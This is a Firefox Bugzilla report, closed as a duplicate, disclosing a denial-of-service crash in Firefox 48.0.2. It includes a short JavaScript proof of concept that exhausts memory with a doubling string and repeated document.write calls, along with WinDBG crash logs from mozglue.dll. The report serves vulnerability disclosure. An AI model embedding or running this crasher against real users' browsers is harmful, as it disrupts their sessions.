Closed Bug 1303694 Opened 8 years ago Closed 8 years ago

Firefox Browser 48.0.2 - (mozglue.dll) Denial Of Service Vulnerability

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
48 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 380223

People

(Reporter: admin, Unassigned)

Details

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Build ID: 20160823121617 Steps to reproduce: PoC: <body onload="javascript:VulnerabilityLab();"></body> <script> function VulnerabilityLab() { var buffer = 'x41'; for (i =0;i<1337;i++) { buffer+=buffer+'x41'; document.write('<html><marque><h1>'+buffer+buffer); } } </script> --- Debug Session Logs [WinDBG] --- Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=00000000 ecx=5dee0a3e edx=00000000 esi=6e837466 edi=00ce70ce eip=6e82efe5 esp=00ce7088 ebp=00ce70d4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesMozilla Firefoxmozglue.dll - mozglue!mozalloc_abort+0x2c: 6e82efe5 cc int 3 mozglue!mozalloc_abort+0x2c: 6e82efe5 cc int 3 6e82efe6 6a03 push 3 6e82efe8 c7050000000021000000 mov dword ptr ds:[0],21h 6e82eff2 ff151060836e call dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xf96 (6e836010)] 6e82eff8 50 push eax 6e82eff9 ff155c60836e call dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xfe2 (6e83605c)] 6e82efff cc int 3 mozglue!mozalloc_handle_oom: 6e82f000 55 push ebp lmvm mozglue start end module name 6e820000 6e83d000 mozglue (export symbols) C:Program FilesMozilla Firefoxmozglue.dll Loaded symbol image file: C:Program FilesMozilla Firefoxmozglue.dll Image path: C:Program FilesMozilla Firefoxmozglue.dll Image name: mozglue.dll Timestamp: Wed Aug 24 06:53:43 2016 (57BD2857) CheckSum: 0001E87D ImageSize: 0001D000 File version: 48.0.2.6079 Product version: 48.0.2.6079 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0000.04b0 CompanyName: Mozilla Foundation ProductName: Firefox InternalName: Firefox OriginalFilename: mozglue.dll ProductVersion: 48.0.2 FileVersion: 48.0.2 FileDescription: 48.0.2 LegalCopyright: License: MPL 2 LegalTrademarks: Mozilla Comments: Mozilla Actual results: Opening the poc code as html allows remote attackers to crash the mozilla firefox browser and firefox os via mozglue.dll. Expected results: The script loop exception should capture the process to protect against uncaught exceptions, bofs or other read/write access violations.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.